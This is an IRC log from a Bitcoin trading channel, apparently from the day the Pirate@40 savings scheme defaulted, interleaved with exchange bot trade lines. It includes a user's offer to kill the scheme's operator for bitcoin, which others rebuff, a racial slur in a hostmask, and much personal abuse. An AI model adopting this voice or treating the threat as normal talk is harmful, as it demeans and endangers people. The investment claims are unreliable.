not the one you're using Aug 29 04:20:56 mvc == mark? Aug 29 04:21:02 ;) Aug 29 04:22:07 ;;ident pirateat40 Aug 29 04:22:07 Nick 'pirateat40', with hostmask 'pirateat40!~pirateat4@unaffiliated/pirateat40', is identified as user pirateat40, with GPG key id 614DB74CFA5B357E, key fingerprint 067508A49BBE0E8216A61A94614DB74CFA5B357E, and bitcoin address 17aacoJaduwjJd6dh9cxgsRLMc5CkB2b9n Aug 29 04:22:15 most valued customer lol Aug 29 04:22:20 mircea_popescu: man Aug 29 04:22:30 I was thinking "I wonder if he means mvp" Aug 29 04:22:37 i ain't a playa. Aug 29 04:22:40 i'r a paya. Aug 29 04:22:40 Diablo-D3: are you that bitsplit guy? Aug 29 04:22:43 and then I started thinking about trains and lava and thought better of it Aug 29 04:22:45 Diablo-D3: same MO Aug 29 04:22:47 dub: no Aug 29 04:22:56 he doessound kinda similar neh ? Aug 29 04:23:04 but in the old age diablo was maybe the best rig builder in the community Aug 29 04:23:12 [GLBSE] [GIGAMINING] 1 @ 0.8989 BTC [-] Aug 29 04:23:15 then he went crazy, tried to make a "million btc" ipo, which failed miserably Aug 29 04:23:17 mircea_popescu: wat? Aug 29 04:23:21 and then he kinda defrauded investoars Aug 29 04:23:25 Diablo-D3 never built a minign rig Aug 29 04:23:26 and nao... well... trolling irc Aug 29 04:23:27 afaik Aug 29 04:23:34 wasn't he the diablo guy with the mining rigs ? Aug 29 04:23:43 he has one GPU and has had one other one previously Aug 29 04:23:47 I never built a rig Aug 29 04:23:50 I just wrote a miner Aug 29 04:23:54 o o o that's right Aug 29 04:23:55 that all the rig builders use Aug 29 04:23:57 no, he wrote a miner Aug 29 04:23:58 wrote the miner, my bad. Aug 29 04:24:00 [MPEX] [F.GIGA.ETF] 11283 @ 0.00095902 = 10.8206 BTC [-] Aug 29 04:24:01 [MPEX] [F.GIGA.ETF] 2417 @ 0.00095052 = 2.2974 BTC [-] Aug 29 04:24:06 a very poor miner at that Aug 29 04:24:20 wrote the miner that none of the rig builders use you mean Aug 29 04:24:27 ^ Aug 29 04:24:32 BTCHero: it was the only option for quite some time Aug 29 04:24:39 cgminer only came out like, what, 4 months ago? Aug 29 04:24:49 nah more than that Aug 29 04:25:02 like feb Aug 29 04:25:09 cgminer is a port of diablominer to C anyways Aug 29 04:25:13 so thats not much of a change Aug 29 04:25:55 wait Aug 29 04:25:59 you wrote it in what, java ? Aug 29 04:26:15 qbasic Aug 29 04:26:22 srsly lol Aug 29 04:26:38 no wait. WAIT. HE DID WRITE IT IN JAVA Aug 29 04:26:48 cpp Aug 29 04:26:56 maybe Aug 29 04:27:09 i dunno, i could find an old copy and see Aug 29 04:27:30 java Aug 29 04:27:44 DiabloMiner is a Java GPU bitcoin miner that uses the OpenCL Aug 29 04:27:53 Aug 29 04:28:12 this should be a felony. Aug 29 04:28:36 [GLBSE] [ARS] 10 @ 0.014 = 0.14 BTC [-] Aug 29 04:28:47 no wonder i never got it to run, i would download it, ./config && make && make install Aug 29 04:29:01 @.@ Aug 29 04:29:30 mircea_popescu: first and last java project Aug 29 04:29:33 so did bitcointalk implode yet? Aug 29 04:29:47 smickles: erm.... but diablominer has no makefile or autoconf shit Aug 29 04:29:52 it uses maven Aug 29 04:30:03 Diablo-D3: i was playing the fool Aug 29 04:30:11 [GLBSE] [TYGRR.BOND-P] 21 @ 0.0999 = 2.0979 BTC [+] Aug 29 04:30:30 =| Aug 29 04:30:47 [MPEX] [S.MPOE] 2577 @ 0.00038546 = 0.9933 BTC [-] Aug 29 04:30:48 [MPEX] [S.MPOE] 39389 @ 0.00038422 = 15.134 BTC [-] Aug 29 04:30:49 [MPEX] [S.MPOE] 2834 @ 0.00038376 = 1.0876 BTC [-] Aug 29 04:32:09 so the big glbse selloff subsequent to default ammounts to 32 bitcoins so far ? Aug 29 04:32:27 such efficient markets, they had already priced the event in. Aug 29 04:33:15 yeah, funny isnt it Aug 29 04:33:23 what do you think happens if 500K coins hit at once Aug 29 04:33:47 JWU42: a soft blorp sound. Aug 29 04:34:04 I think some will sell JW some wont, I highly doubt 500k go to market all at once Aug 29 04:34:05 nobody can sell off on the P news as he has all the coins Aug 29 04:34:09 JWU42 500k coins hit glbse ? Aug 29 04:34:22 ahaha. all the coins. jesus. Aug 29 04:34:31 ALL THE COINS \o/ Aug 29 04:34:33 no - if P WERE (big if there) all 500K coins to his lenders at once Aug 29 04:34:53 mtgox goes to ? Aug 29 04:34:54 It looked like they had a special meeting Aug 29 04:35:00 they are meeting Aug 29 04:35:04 getting some info Aug 29 04:35:11 hookers and blow? Aug 29 04:35:12 but waiting for the full log Aug 29 04:36:06 I just want it done, I downloaded a game just so I would go do something else other than scour the forums for info. Aug 29 04:36:34 ;;bids 500000 Aug 29 04:36:36 There are currently 0 bitcoins demanded at or over 500000.0 USD, worth 0.0 USD in total. Aug 29 04:36:44 lol Aug 29 04:37:02 ;;bids 1 Aug 29 04:37:04 There are currently 613414.16 bitcoins demanded at or over 1.0 USD, worth 2045668.15013 USD in total. Aug 29 04:37:12 what's the command to check for 500k in sales Aug 29 04:37:26 ;;market help Aug 29 04:37:27 Error: The "Market" plugin is loaded, but there is no command named "help" in it. Try "list Market" to see the commands in the "Market" plugin. Aug 29 04:37:38 er Aug 29 04:37:45 ;;market --btc 500000 Aug 29 04:37:46 Error: The "Market" plugin is loaded, but there is no command named "--btc" in it. Try "list Market" to see the commands in the "Market" plugin. Aug 29 04:37:49 :P Aug 29 04:37:53 ;;market sell 500000 Aug 29 04:37:55 A market order to sell 500000 bitcoins right now would net 1918050.7186 USD and would take the last price down to 1.1500 USD, resulting in an average price of 3.8361 USD/BTC. Aug 29 04:38:14 There you go! Aug 29 04:38:18 if it was a ponzi there aren't 500k coins Aug 29 04:38:18 that would be interesting Aug 29 04:38:26 much much less Aug 29 04:38:28 (thx BTC-Mining ) Aug 29 04:38:29 I wonder if the Network rate would drop with that Aug 29 04:38:34 [GLBSE] [ARS] 33 @ 0.0143 = 0.4719 BTC [+] Aug 29 04:38:36 seems to rise with the bitcoin rise Aug 29 04:39:40 It would drop a lot Aug 29 04:39:56 [GLBSE] [TYGRR.BOND-P] 4 @ 0.0535 = 0.214 BTC [-] Aug 29 04:39:58 [GLBSE] [TYGRR.BOND-P] 1 @ 0.0531 BTC [-] Aug 29 04:39:59 [GLBSE] [TYGRR.BOND-P] 40 @ 0.053 = 2.12 BTC [-] Aug 29 04:40:00 [GLBSE] [TYGRR.BOND-P] 15 @ 0.052 = 0.78 BTC [-] Aug 29 04:40:29 not by that much Aug 29 04:40:35 mining is overpriced atm Aug 29 04:40:37 ;;sell 1 'gpumax account' @ 10 btc price negotable, this thing is icky now, and i don't want it Aug 29 04:40:37 gribble: ? Aug 29 04:40:37 Error: "account'" is not a valid price input. Aug 29 04:41:07 ;;sell 1 "gpumax account" @ 10 btc price negotable, this thing is icky now, and i don't want it Aug 29 04:41:08 Order id 9867 created. Aug 29 04:41:10 [GLBSE] [FOO.PPPPT] 3 @ 0.08 = 0.24 BTC [-] Aug 29 04:41:11 [GLBSE] [FOO.PPPPT] 3 @ 0.051 = 0.153 BTC [-] Aug 29 04:41:12 [GLBSE] [FOO.PPPPT] 5 @ 0.0501 = 0.2505 BTC [-] Aug 29 04:41:22 gribble is single-quotist Aug 29 04:41:36 Hes still been paying the Gpumax accounts hasent he? Aug 29 04:41:42 yup Aug 29 04:42:17 Unfortunatly this still isint over, I mean we dont know what exactly he may still pay out, if nothing of course. Aug 29 04:42:32 Partial payments I mean Aug 29 04:42:38 ofc Aug 29 04:42:52 i'm just not going to use my gpumax account anymore Aug 29 04:42:55 What does ofc mean again? Aug 29 04:43:00 did the interests stop now lol? Aug 29 04:43:02 "of course" Aug 29 04:43:06 Oh Aug 29 04:43:15 Id buy it for .50 btc smickles Aug 29 04:43:24 Sold! Aug 29 04:43:39 Haha ok, done. Aug 29 04:43:39 let me make the changes and such Aug 29 04:43:53 ;;cancel 9867 Aug 29 04:43:53 Error: "cancel" is not a valid command. Aug 29 04:44:02 ;;remove 9867 Aug 29 04:44:03 Order 9867 removed. Aug 29 04:44:04 [GLBSE] [ASIC.COOP] 2 @ 0.26 = 0.52 BTC [+] Aug 29 04:44:22 Figures im on in windows, and have no access to my wallet crap Aug 29 04:44:31 Oh well guess im halting the game download Aug 29 04:44:43 if pirate continues gpumax he will certainly ban that account Aug 29 04:45:01 Why would he ban the account? Aug 29 04:45:06 PPT's selling for 5% of face, lol Aug 29 04:45:14 he has said if you share/sell the account you lose it Aug 29 04:45:25 damn Doffx, i cant change the email address Aug 29 04:45:46 Its ok smickles, was worth a shot. Aug 29 04:46:04 you can leave email same Aug 29 04:46:18 i suppose there is no harm in that Aug 29 04:46:26 ;;ticker Aug 29 04:46:27 Best bid: 10.9, Best ask: 10.98, Bid-ask spread: 0.08000, Last trade: 10.98, 24 hour volume: 56916, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 29 04:46:37 Doffx: are you prepared to take the risk of just losing the account? Aug 29 04:46:40 As long as I can use the account an point my miners at it Aug 29 04:46:58 Yeah for .50 if it gets locked im not going to cry Aug 29 04:47:05 you should be able to log in and setyourself up Aug 29 04:47:06 gabbynot, why wouldn't it? Aug 29 04:47:26 [GLBSE] [TYGRR.BOND-P] 5 @ 0.0999 = 0.4995 BTC [+] Aug 29 04:47:45 https://bitcointalk.org/index.php?topic=103623.msg1141603#msg1141603 for the lulz. Aug 29 04:47:56 [GLBSE] [TYGRR.BOND-P] 7 @ 0.1 = 0.7 BTC [+] Aug 29 04:48:04 you can change the payout addy and password easily enough Aug 29 04:48:24 and it is much easier to detect sharing than a sold account Aug 29 04:49:13 II. Open Krakken Bank of Bitcoin Aug 29 04:49:17 apparently this was premonitory. Aug 29 04:50:20 anyone wanna test smpake permanent links to mtgox Aug 29 04:50:37 shit is done, i just need to write faq and launch Aug 29 04:51:18 [GLBSE] [GIGAMINING] 1 @ 0.878 BTC [-] Aug 29 04:51:20 [GLBSE] [GIGAMINING] 5 @ 0.8732 = 4.366 BTC [-] Aug 29 04:51:21 [GLBSE] [GIGAMINING] 11 @ 0.8731 = 9.6041 BTC [-] Aug 29 04:51:22 [GLBSE] [GIGAMINING] 30 @ 0.87 = 26.1 BTC [-] Aug 29 04:51:23 [GLBSE] [GIGAMINING] 26 @ 0.86 = 22.36 BTC [-] Aug 29 04:52:16 [MPEX] [F.GIGA.ETF] 4983 @ 0.00095052 = 4.7364 BTC [-] Aug 29 04:52:18 [MPEX] [F.GIGA.ETF] 11400 @ 0.00095032 = 10.8336 BTC [-] Aug 29 04:52:19 [MPEX] [F.GIGA.ETF] 10200 @ 0.00093745 = 9.562 BTC [-] Aug 29 04:52:20 [MPEX] [F.GIGA.ETF] 3863 @ 0.00093667 = 3.6184 BTC [-] Aug 29 04:52:22 [MPEX] [F.GIGA.ETF] 17100 @ 0.00093562 = 15.9991 BTC [-] Aug 29 04:52:23 [MPEX] [F.GIGA.ETF] 2033 @ 0.00093463 = 1.9001 BTC [-] Aug 29 04:52:24 [MPEX] [F.GIGA.ETF] 421 @ 0.00092575 = 0.3897 BTC [-] Aug 29 04:52:45 [MPEX] [F.GIGA.ETF] 8179 @ 0.00092575 = 7.5717 BTC [-] Aug 29 04:52:46 [MPEX] [F.GIGA.ETF] 11376 @ 0.0009235 = 10.5057 BTC [-] Aug 29 04:52:48 [MPEX] [F.GIGA.ETF] 21000 @ 0.00092276 = 19.378 BTC [-] Aug 29 04:52:49 [MPEX] [F.GIGA.ETF] 8700 @ 0.00091803 = 7.9869 BTC [-] Aug 29 04:52:50 [MPEX] [F.GIGA.ETF] 10745 @ 0.00090999 = 9.7778 BTC [-] Aug 29 04:53:16 [MPEX] [F.GIGA.ETF] 5030 @ 0.00090999 = 4.5772 BTC [-] Aug 29 04:53:18 [MPEX] [F.GIGA.ETF] 18000 @ 0.00089179 = 16.0522 BTC [-] Aug 29 04:53:19 [MPEX] [F.GIGA.ETF] 470 @ 0.00064789 = 0.3045 BTC [-] Aug 29 04:53:25 one at a time please Aug 29 04:53:31 :p Aug 29 04:53:56 i haven't used mtgox in > 6 months Aug 29 04:53:57 i can't even make jokes, these are my friends who lost money Aug 29 04:54:34 what is f.giga.etf Aug 29 04:54:56 gigamining equiv. Aug 29 04:55:00 oh Aug 29 04:55:17 i wish i didn't own gigaming anymore Aug 29 04:55:24 but im going to ride it into the dirt Aug 29 04:55:32 stupid way to play. Aug 29 04:55:37 thanks Aug 29 04:55:51 hey, it's nothing personal. Aug 29 04:55:53 ;;ticker Aug 29 04:55:54 Best bid: 10.97275, Best ask: 10.98, Bid-ask spread: 0.00725, Last trade: 11.01931, 24 hour volume: 57026, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 29 04:56:04 the btc doesn't seem to care about pigeons friends. Aug 29 04:56:05 I am unoffended Aug 29 05:03:19 :D Aug 29 05:03:29 /nick nonethenever Aug 29 05:03:59 ;;ticker Aug 29 05:04:00 Best bid: 11.11, Best ask: 11.11088, Bid-ask spread: 0.00088, Last trade: 11.10999, 24 hour volume: 60548, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 29 05:04:44 taking offers on killing pirate Aug 29 05:05:04 ask starting 1000BTC Aug 29 05:05:36 gtfo Aug 29 05:06:31 o ya, there's a lot of money in selling corpses Aug 29 05:06:41 you could get as much as 80 bucks for a reasonably fresh one Aug 29 05:06:43 great plan! Aug 29 05:07:42 im offering the service of killing pirate Aug 29 05:07:54 victims are welcome to pool together an account Aug 29 05:07:59 how about you leave that out of this chan ;) Aug 29 05:08:45 for real, there are more appropriate channels for trolling like that Aug 29 05:10:21 ya. like... the sewage channel. Aug 29 05:10:43 why am i trolling? Aug 29 05:10:56 be prepared to deal with consequences of your actions Aug 29 05:10:56 ;;ident ic3d Aug 29 05:10:56 Nick 'ic3d', with hostmask 'ic3d!~n1gg3r@180.210.201.136', is not identified. Aug 29 05:11:17 lol wut Aug 29 05:11:22 if you're going to do business, you should at least ident Aug 29 05:11:44 ;;getrating ic3d Aug 29 05:11:44 This user has not yet been rated. WARNING: Currently not authenticated. Aug 29 05:12:02 I only deal with highly rated contract killers Aug 29 05:12:03 he's a cheap killer, works for $10k Aug 29 05:12:06 can't afford gpg Aug 29 05:12:07 n1gg3r? srsly? Aug 29 05:13:38 i just googled that ip, for the fun of it. first result Aug 29 05:13:43 project honeypot Aug 29 05:13:57 lol Aug 29 05:14:41 tha;ts his gf Aug 29 05:14:47 she's running a pills affiliate scheme Aug 29 05:17:04 problem with bitcoin is there is no established debt markets inplace to raise capital for projects Aug 29 05:17:12 lol Aug 29 05:17:36 i mean real projects not wealth transfering schemes Aug 29 05:17:36 ic3d: I agree Aug 29 05:17:40 ie gambling and stock exchanges Aug 29 05:17:47 and ponzis Aug 29 05:18:15 the problem is there's nobody whose project is worth bitcoins atm. Aug 29 05:18:25 any dood can write shit on the inteernet, the value of that is satoshis. Aug 29 05:18:42 make it work first, then we can talk about it Aug 29 05:18:49 three month's revenue, solid growth potential et all. Aug 29 05:19:57 all the bitcoin projects are wealth transfering schemes Aug 29 05:20:03 theres no wealth creating investments Aug 29 05:20:09 all economy primarily exists to transfer wealth. Aug 29 05:20:16 no it doesnt Aug 29 05:20:25 what qualifies you to opine on this topic ? Aug 29 05:20:27 a proper economy creates wealth not transfers it Aug 29 05:20:32 mk i had enough Aug 29 05:20:41 bitcoin is purely a mechanism to transfer dollars around Aug 29 05:20:47 ic3d!*@* added to ignore list. Aug 29 05:22:15 isn't the idea of wealth creation kinda antithetical to bitcoin? Aug 29 05:22:49 wealth isn't created, there is a finite amount of it Aug 29 05:23:08 not all wealth has been acquired yet tho Aug 29 05:23:20 how is wealth created then? Aug 29 05:23:27 bitcoin is not wealth per se, it's just the medium of exchange. Aug 29 05:23:31 [GLBSE] [TYGRR.BOND-P] 20 @ 0.2 = 4 BTC [+] Aug 29 05:23:53 that's not even a sentense Aug 29 05:24:02 smickles, wealth is not only about making new money appear... Aug 29 05:24:33 that sounds like more efficient use of the wealth which already exists Aug 29 05:24:57 money doesn't represent wealth in a set ratio tho Aug 29 05:25:07 it ebbs, flows, jumps crashes Aug 29 05:25:28 [MPEX] [S.MPOE] 11500 @ 0.00038376 = 4.4132 BTC [-] Aug 29 05:25:30 i agree Aug 29 05:26:24 still, why do you call that 'chain' you listed wealth creation, rather than more efficient use of preexisting wealth Aug 29 05:26:46 that's tautologous Aug 29 05:26:58 [GLBSE] [TYGRR.BOND-P] 20 @ 0.209 = 4.18 BTC [+] Aug 29 05:27:09 ofc the computer didn't exist before, but all the materials already did Aug 29 05:27:31 wealth of those commodities just was used more efficiently Aug 29 05:27:42 no wealth created then Aug 29 05:27:46 it was already there Aug 29 05:27:56 ostensibly, by your own admission Aug 29 05:28:14 the value was already there Aug 29 05:28:24 it just wasn't being utilized yet Aug 29 05:28:46 [GLBSE] [TYGRR.BOND-P] 30 @ 0.209 = 6.27 BTC [+] Aug 29 05:28:54 the nominal value of things increases as we use them more efficiently, however Aug 29 05:29:01 [MPEX] [S.MPOE] 19166 @ 0.00038376 = 7.3551 BTC [-] Aug 29 05:29:01 the actual value was there all along Aug 29 05:29:02 [MPEX] [S.MPOE] 15834 @ 0.00038364 = 6.0746 BTC [-] Aug 29 05:29:19 non sequitor Aug 29 05:29:59 [GLBSE] [TYGRR.BOND-P] 8 @ 0.21 = 1.68 BTC [+] Aug 29 05:30:00 didn't you just earlier claim that value was wealth? Aug 29 05:30:21 non sequitor Aug 29 05:30:21 [GLBSE] [TYGRR.BOND-P] 40 @ 0.1 = 4 BTC [-] Aug 29 05:30:26 sequitur Aug 29 05:30:41 ah, thx mp Aug 29 05:30:51 i spell awefully poorly Aug 29 05:31:07 [GLBSE] [TYGRR.BOND-P] 1 @ 0.21 BTC [+] Aug 29 05:31:10 and have syntax ambiguities apparently Aug 29 05:31:13 latin be challenging Aug 29 05:32:10 [GLBSE] [TYGRR.BOND-P] 30 @ 0.07 = 2.1 BTC [-] Aug 29 05:32:11 [GLBSE] [TYGRR.BOND-P] 3 @ 0.06 = 0.18 BTC [-] Aug 29 05:32:14 i take it you are giving up on our discussion? Aug 29 05:32:31 ad hominem Aug 29 05:32:42 [GLBSE] [GMVT-BOT] 21 @ 0.14 = 2.94 BTC [-] Aug 29 05:33:24 that's just a facile reason not to continue discussing something Aug 29 05:33:25 :( Aug 29 05:33:34 fascile Aug 29 05:33:45 i do, often Aug 29 05:34:01 none Aug 29 05:34:36 Wtf Aug 29 05:34:37 ;;ticker Aug 29 05:34:37 Best bid: 11.05005, Best ask: 11.118, Bid-ask spread: 0.06795, Last trade: 11.05005, 24 hour volume: 60537, 24 hour low: 10.5, 24 hour high: 11.20999 Aug 29 05:34:40 [GLBSE] [TYGRR.BOND-P] 13 @ 0.2 = 2.6 BTC [+] Aug 29 05:34:40 i'm only in debt to a mortgage of a house which i rent out to people Aug 29 05:35:12 it was? Aug 29 05:35:18 do you mean title? Aug 29 05:35:35 how was the debt underwritten by the state? Aug 29 05:35:35 [GLBSE] [BDK.BND] 500 @ 0.101 = 50.5 BTC [+] Aug 29 05:35:45 i bought well before then Aug 29 05:36:04 [GLBSE] [TYGRR.BOND-P] 17 @ 0.2 = 3.4 BTC [+] Aug 29 05:36:06 [GLBSE] [TYGRR.BOND-P] 54 @ 0.205 = 11.07 BTC [+] Aug 29 05:36:07 [GLBSE] [TYGRR.BOND-P] 20 @ 0.21 = 4.2 BTC [+] Aug 29 05:36:08 ah, so statistically, you figure mine was underwritten by the state Aug 29 05:36:08 [GLBSE] [TYGRR.BOND-P] 59 @ 0.25 = 14.75 BTC [+] Aug 29 05:36:30 why do you doubt that i had a 30% down payment? Aug 29 05:36:33 that is some optimistic shit Aug 29 05:36:38 buying ppt at this point Aug 29 05:36:40 it was only a 110000 usd house Aug 29 05:37:12 dub look at the values involved. Aug 29 05:37:14 because i had to move, and it's an easier situation than selling it Aug 29 05:37:17 ppl play satoshi dice for 250 btf Aug 29 05:37:45 ic3d: it's better to put money into higher return ventures than to pay off cheap debt Aug 29 05:37:52 mircea_popescu: yeah but pirate basically admitted that he's filing bankrupcy Aug 29 05:37:55 [GLBSE] [TYGRR.BOND-P] 20 @ 0.2 = 4 BTC [-] Aug 29 05:38:06 [GLBSE] [BDK.BND] 250 @ 0.10040001 = 25.1 BTC [-] Aug 29 05:38:20 filing ? where ? Aug 29 05:38:24 [GLBSE] [TYGRR.BOND-P] 41 @ 0.25 = 10.25 BTC [+] Aug 29 05:38:32 https://bitcointalk.org/index.php?topic=82573.msg1141715#msg1141715 Aug 29 05:38:54 [GLBSE] [TYGRR.BOND-P] 27 @ 0.28 = 7.56 BTC [+] Aug 29 05:39:48 ic3d: i don't think 5% return is too hard to come by with not so much risk Aug 29 05:39:51 infact Aug 29 05:39:53 Your best bet is to sit on BTC for a good long time Aug 29 05:39:58 if this is you trolling, i'm going to fly to Texas to kick your ass and buy you some more makers 46 Aug 29 05:39:59 i set that operation up at the house itself Aug 29 05:40:01 That will get you the most return Aug 29 05:40:02 i find people so very amusing Aug 29 05:40:18 oh god is pirate making more excuses? Aug 29 05:40:21 i didn't say without risk ic3d Aug 29 05:40:31 EmanuelDeOrtego: no this is the end game Aug 29 05:40:39 i make a > 5% profit off of my tennants Aug 29 05:40:50 he's turning ponzi jail time into failed business venture Aug 29 05:40:52 [GLBSE] [BDK.BND] 170 @ 0.1004 = 17.068 BTC [-] Aug 29 05:41:00 [GLBSE] [GSDPT] 300 @ 0.0032 = 0.96 BTC [-] Aug 29 05:41:05 ic3d: you really don't understand my situation, do you? Aug 29 05:41:38 yaya. cause anyone cares what he says. Aug 29 05:41:39 I want to get some rental properties Aug 29 05:41:46 well, it's only a rental because i was displaced by the military Aug 29 05:41:54 [GLBSE] [TYGRR.BOND-P] 33 @ 0.28 = 9.24 BTC [+] Aug 29 05:41:55 [GLBSE] [TYGRR.BOND-P] 42 @ 0.29999 = 12.5996 BTC [+] Aug 29 05:41:57 ic3d: I don't live where you live though, property is a better bet here Aug 29 05:42:14 ic3d: how do you figure i am a leech? Aug 29 05:42:15 because its scarce as fuck Aug 29 05:42:26 ic3d: i do not Aug 29 05:42:33 [GLBSE] [FOO.PPPPT] 12 @ 0.099 = 1.188 BTC [+] Aug 29 05:42:40 ic3d: again, you really don't understand my situation Aug 29 05:42:44 and I could pay each house off in about a year Aug 29 05:42:59 ic3d: my income comes mostly from selling software for bitcoin Aug 29 05:43:04 [GLBSE] [TYGRR.BOND-P] 42 @ 0.2799 = 11.7558 BTC [-] Aug 29 05:43:55 ic3d: after software, comes accounting services Aug 29 05:44:05 again, for bitcoin Aug 29 05:44:26 smickles: So you live off Bitcoins? : O Aug 29 05:44:47 [GLBSE] [BIB.PIRATE] 10 @ 0.099 = 0.99 BTC [-] Aug 29 05:44:59 EmanuelDeOrtego: very nearly, my wife provides usd for the family Aug 29 05:45:23 EmanuelDeOrtego: and there is the whole situation with the house in columbia Aug 29 05:45:40 that's not a bitcoin operation Aug 29 05:45:48 Heh. Aug 29 05:46:16 I will need a lawyers number also before I give out any information as you are the one that has messed this up. Aug 29 05:46:16 Thanks guys, have a good night. Aug 29 05:46:16 giving us 48 hours to make a list or not get btc is fail... Aug 29 05:46:16 * pirateat40 sets mode +m #btcst-trust Aug 29 05:46:29 i seriously will need to see some pretty heavy duty ashes in head from all these muppets. Aug 29 05:46:37 copumpkin, gigavps, patrickharnett etfc, the whole gang. Aug 29 05:47:01 It's getting harsher and harsher Aug 29 05:47:10 lol bad day mircea, lose more money than you could risk? Aug 29 05:47:13 everyone thinks they're smart nowadays, that's fine. Aug 29 05:47:27 Chaang-Noi i lost diddly squat on your stupidity there, ftr. Aug 29 05:47:47 but i will not tolerate any pretense that you are either clever or competent. any opf you. Aug 29 05:47:51 < mircea_popescu> i seriously will need to see some pretty heavy duty ashes in head from all these muppets. << did that make sense Aug 29 05:47:51 you're twelve year olds. Aug 29 05:47:53 then why are you bitching like a girl? Aug 29 05:48:00 umad.jpeg Aug 29 05:48:09 [GLBSE] [GMVT-BOT] 1 @ 0.179 BTC [+] Aug 29 05:48:18 i'm not mad. i'm despisefull. Aug 29 05:48:25 no BTCHero it did not Aug 29 05:48:40 BTCHero when people fuck up Aug 29 05:48:46 they spend a while saying what huge idiots they werre Aug 29 05:48:49 and how sorry they were Aug 29 05:49:08 and they post pictures with ashes in the hair on their dumb heads. Aug 29 05:49:10 ancient custom. Aug 29 05:49:23 and then they go hide under a rock Aug 29 05:49:26 oh, must be a romanian thing or something Aug 29 05:49:29 and never ever ever again pretend they know finance. Aug 29 05:49:36 BTCHero actually, jewish. Aug 29 05:49:46 well, it isn't common in ohio :) Aug 29 05:49:54 well, there's a reason ohio is ohio. Aug 29 05:49:56 bad customs. Aug 29 05:50:25 when Mirceas exchange fails or he runs with the money people like mircea will blame deadT for having a pass though... Aug 29 05:50:36 IF. Aug 29 05:50:42 [GLBSE] [OBSI.HRPT] 1 @ 0.10498899 BTC [+] Aug 29 05:50:43 get your conditionals straight. Aug 29 05:51:05 they are Aug 29 05:51:19 but you see my point? deadt is not a scammer Aug 29 05:51:20 i told you not to do it, back in april. o, no, you knew better ? Aug 29 05:51:21 heh,. Aug 29 05:51:25 he is giving a service people want Aug 29 05:51:26 [GLBSE] [TYGRR.BOND-P] 1 @ 0.19 BTC [-] Aug 29 05:51:27 on your knees. Aug 29 05:51:52 i see nothing wrong with what i have done just like deadT has done nothing wrong Aug 29 05:51:56 "service people want" whopdedoo. Aug 29 05:52:00 so did pirate, right ? Aug 29 05:52:07 you're all a buncha providers of services people want. Aug 29 05:52:37 [GLBSE] [TYGRR.BOND-P] 13 @ 0.2 = 2.6 BTC [+] Aug 29 05:52:46 Chaang-Noi go write your "i fucked up i'm sorry" note and stop arguing with me. Aug 29 05:52:51 i am wiser than you. Aug 29 05:52:51 im sure nefario and theymos are just as guilty then.. you sure are crazy Aug 29 05:52:56 i can belive im spamming with this again... links are live http://smpake.com/ Aug 29 05:53:05 go test Aug 29 05:53:11 mircea_popescu: people who went through goat knew what they were getting into, i don't see the problem Aug 29 05:53:39 [GLBSE] [BDK.BND] 9 @ 0.1 = 0.9 BTC [-] Aug 29 05:53:40 [GLBSE] [BDK.BND] 500 @ 0.1 = 50 BTC [-] Aug 29 05:53:44 mircea just wants to cry like a girl cuz he is bored, the adults knew what they were doing Aug 29 05:54:17 [GLBSE] [FPGAMINING] 1 @ 0.8389 BTC [-] Aug 29 05:54:18 I opted not to do a pirate passthrough because I feared it would default, no matter if I wouldn't be responsible for that default and people would have wanted that. Aug 29 05:54:32 BTC-Mining you're not exactly the only one. Aug 29 05:54:43 I agree with that too Aug 29 05:54:43 I made one for Kraken Funds strictly because I trust patrick to be reliable Aug 29 05:54:58 and I was paying him 2.5% weekly in interest at some point Aug 29 05:55:01 [GLBSE] [BDK.BND] 178 @ 0.0985 = 17.533 BTC [-] Aug 29 05:55:08 for all the talk about adults, adults are the people who man up. Aug 29 05:55:12 Worrying about money is stupid. If it's lost, you accept it and learn. Aug 29 05:55:12 but I don't fault someone else for doing something i wouldn't do Aug 29 05:55:19 So His 0% - 2.5% seems fine with me Aug 29 05:55:27 [GLBSE] [COGNITIVE] 1 @ 0.64 BTC [-] Aug 29 05:55:28 [GLBSE] [COGNITIVE] 1 @ 0.636 BTC [-] Aug 29 05:55:30 [GLBSE] [FZB.A] 66 @ 0.0301 = 1.9866 BTC [-] Aug 29 05:55:37 BTCHero i will fault someone for pushing crap debt to the otherwise dumb-as-rocks penny investors on glbse. Aug 29 05:55:43 kakobrekla: do i need javascripy on it? Aug 29 05:55:49 And even if he defaulted/screwed up while we had proof he could get the rates, I'd apologize =/ Aug 29 05:55:49 [GLBSE] [FZB.A] 125 @ 0.03 = 3.75 BTC [-] Aug 29 05:55:51 s/y/t/ Aug 29 05:56:06 not really Aug 29 05:56:46 yeah its absurd! Aug 29 05:56:48 should be at least 7 Aug 29 05:56:58 I was paying the guy 2.5% per week... Aug 29 05:57:01 for a loan Aug 29 05:57:13 which was very profitable Aug 29 05:57:16 I have a few coins with patrick harnett and a few in KRAKEN Aug 29 05:57:23 About a month Aug 29 05:57:40 BTC-Mining: it's simple interest, right? Aug 29 05:57:41 [GLBSE] [ASICMINER] 2 @ 0.11 = 0.22 BTC [-] Aug 29 05:57:43 [GLBSE] [ASICMINER] 6 @ 0.106 = 0.636 BTC [-] Aug 29 05:57:44 [GLBSE] [ASICMINER] 4 @ 0.1051 = 0.4204 BTC [-] Aug 29 05:57:45 [GLBSE] [ASICMINER] 6 @ 0.105 = 0.63 BTC [-] Aug 29 05:57:46 [GLBSE] [ASICMINER] 84 @ 0.10021 = 8.4176 BTC [-] Aug 29 05:57:47 [GLBSE] [ASICMINER] 30 @ 0.1001 = 3.003 BTC [-] Aug 29 05:57:47 Well he does a lot of those loans... Aug 29 05:57:55 and 2.5% is the maximum Aug 29 05:58:04 He can pay less Aug 29 05:58:12 it varies depending on the profits. Aug 29 05:58:42 [GLBSE] [BDT] 54 @ 0.801 = 43.254 BTC [-] Aug 29 05:59:12 If you consider mining makes on average at least 1% profit, this rates range is acceptable. Aug 29 05:59:26 No I don't need loans. But I need one a while ago Aug 29 05:59:33 But I needed* Aug 29 05:59:39 kakobrekla: "oftenly"? Aug 29 06:00:17 Not to count you can play MtGox, can be very lucrative Aug 29 06:00:28 smickles fixed :) Aug 29 06:00:29 With the stupidly high volatility Aug 29 06:00:31 I still want to know how i can get in on all this loaning action to secure a loan for a rental property Aug 29 06:00:34 thanks btw. Aug 29 06:00:46 but the risk of btc rising basically removes the possibility Aug 29 06:00:56 and the humongous interests... Aug 29 06:00:56 oh shit, i have 2.5 cents still in gox Aug 29 06:00:59 i'm rich! Aug 29 06:01:16 a 